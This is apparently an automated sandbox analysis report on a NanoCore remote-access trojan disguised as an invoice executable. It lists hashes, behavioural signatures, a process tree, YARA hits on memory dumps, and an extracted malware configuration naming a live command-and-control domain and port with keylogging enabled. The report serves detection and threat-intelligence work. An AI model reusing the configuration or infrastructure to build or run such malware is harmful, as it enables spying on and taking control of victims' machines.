Play interactive tour

Edit tour

Windows Analysis Report G2M8C76V_INV0ICE_RECEIPT.exe

Overview

General Information

Sample Name:	G2M8C76V_INV0ICE_RECEIPT.exe
Analysis ID:	552628
MD5:	d272e884f59ff9d7921619f88766709d
SHA1:	b9013dcffc28e174c1cb7d81fd46b6463b4ff579
SHA256:	94a00e5d13eebc1a99dd48e2d9f9cb48935c424c6bd58ab9f6d78ff0caa36506
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Detected Nanocore Rat

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Yara detected Nanocore RAT

Detected unpacking (creates a PE file in dynamic memory)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

G2M8C76V_INV0ICE_RECEIPT.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" MD5: D272E884F59FF9D7921619F88766709D)

G2M8C76V_INV0ICE_RECEIPT.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" MD5: D272E884F59FF9D7921619F88766709D)

chmac.exe (PID: 6288 cmdline: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" MD5: D272E884F59FF9D7921619F88766709D)

chmac.exe (PID: 6556 cmdline: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" MD5: D272E884F59FF9D7921619F88766709D)

chmac.exe (PID: 6760 cmdline: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" MD5: D272E884F59FF9D7921619F88766709D)

chmac.exe (PID: 6820 cmdline: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" MD5: D272E884F59FF9D7921619F88766709D)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "1f8684ca-0835-4252-89d1-4a2b1be1", "Group": "boy of john", "Domain1": "boyhome5100.duckdns.org", "Domain2": "boyhome5100.duckdns.org", "Port": 5100, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x123e5:$x1: NanoCore.ClientPluginHost 0x12422:$x2: IClientNetworkHost 0x15f55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1214d:$a: NanoCore 0x1215d:$a: NanoCore 0x12391:$a: NanoCore 0x123a5:$a: NanoCore 0x123e5:$a: NanoCore 0x121ac:$b: ClientPlugin 0x123ae:$b: ClientPlugin 0x123ee:$b: ClientPlugin 0x122d3:$c: ProjectData 0x12cda:$d: DESCrypto 0x1a6a6:$e: KeepAlive 0x18694:$g: LogClientMessage 0x1488f:$i: get_Connected 0x13010:$j: #=q 0x13040:$j: #=q 0x1305c:$j: #=q 0x1308c:$j: #=q 0x130a8:$j: #=q 0x130c4:$j: #=q 0x130f4:$j: #=q 0x13110:$j: #=q
0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x24415:$x1: NanoCore.ClientPluginHost 0x24452:$x2: IClientNetworkHost 0x27f85:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xbb80:$a: NanoCore 0x2417d:$a: NanoCore 0x2418d:$a: NanoCore 0x243c1:$a: NanoCore 0x243d5:$a: NanoCore 0x24415:$a: NanoCore 0x241dc:$b: ClientPlugin 0x243de:$b: ClientPlugin 0x2441e:$b: ClientPlugin 0x24303:$c: ProjectData 0x24d0a:$d: DESCrypto 0x2c6d6:$e: KeepAlive 0x2a6c4:$g: LogClientMessage 0x268bf:$i: get_Connected 0x25040:$j: #=q 0x25070:$j: #=q 0x2508c:$j: #=q 0x250bc:$j: #=q 0x250d8:$j: #=q 0x250f4:$j: #=q 0x25124:$j: #=q
0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x26b45:$x1: NanoCore.ClientPluginHost 0x26b82:$x2: IClientNetworkHost 0x2a6b5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6988:$a: NanoCore 0x268ad:$a: NanoCore 0x268bd:$a: NanoCore 0x26af1:$a: NanoCore 0x26b05:$a: NanoCore 0x26b45:$a: NanoCore 0x2690c:$b: ClientPlugin 0x26b0e:$b: ClientPlugin 0x26b4e:$b: ClientPlugin 0x26a33:$c: ProjectData 0x2743a:$d: DESCrypto 0x2ee06:$e: KeepAlive 0x2cdf4:$g: LogClientMessage 0x28fef:$i: get_Connected 0x27770:$j: #=q 0x277a0:$j: #=q 0x277bc:$j: #=q 0x277ec:$j: #=q 0x27808:$j: #=q 0x27824:$j: #=q 0x27854:$j: #=q
00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x123e5:$x1: NanoCore.ClientPluginHost 0x12422:$x2: IClientNetworkHost 0x15f55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1214d:$a: NanoCore 0x1215d:$a: NanoCore 0x12391:$a: NanoCore 0x123a5:$a: NanoCore 0x123e5:$a: NanoCore 0x121ac:$b: ClientPlugin 0x123ae:$b: ClientPlugin 0x123ee:$b: ClientPlugin 0x122d3:$c: ProjectData 0x12cda:$d: DESCrypto 0x1a6a6:$e: KeepAlive 0x18694:$g: LogClientMessage 0x1488f:$i: get_Connected 0x13010:$j: #=q 0x13040:$j: #=q 0x1305c:$j: #=q 0x1308c:$j: #=q 0x130a8:$j: #=q 0x130c4:$j: #=q 0x130f4:$j: #=q 0x13110:$j: #=q
00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000010.00000002.359549562.00000000028EE000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x19667:$a: NanoCore 0x196c0:$a: NanoCore 0x196fd:$a: NanoCore 0x19776:$a: NanoCore 0x196c9:$b: ClientPlugin 0x19706:$b: ClientPlugin 0x1a004:$b: ClientPlugin 0x1a011:$b: ClientPlugin 0x10ed0:$e: KeepAlive 0x19b51:$g: LogClientMessage 0x19ad1:$i: get_Connected 0xb699:$j: #=q 0xb6c9:$j: #=q 0xb705:$j: #=q 0xb72d:$j: #=q 0xb75d:$j: #=q 0xb78d:$j: #=q 0xb7bd:$j: #=q 0xb7ed:$j: #=q 0xb809:$j: #=q 0xb839:$j: #=q
00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
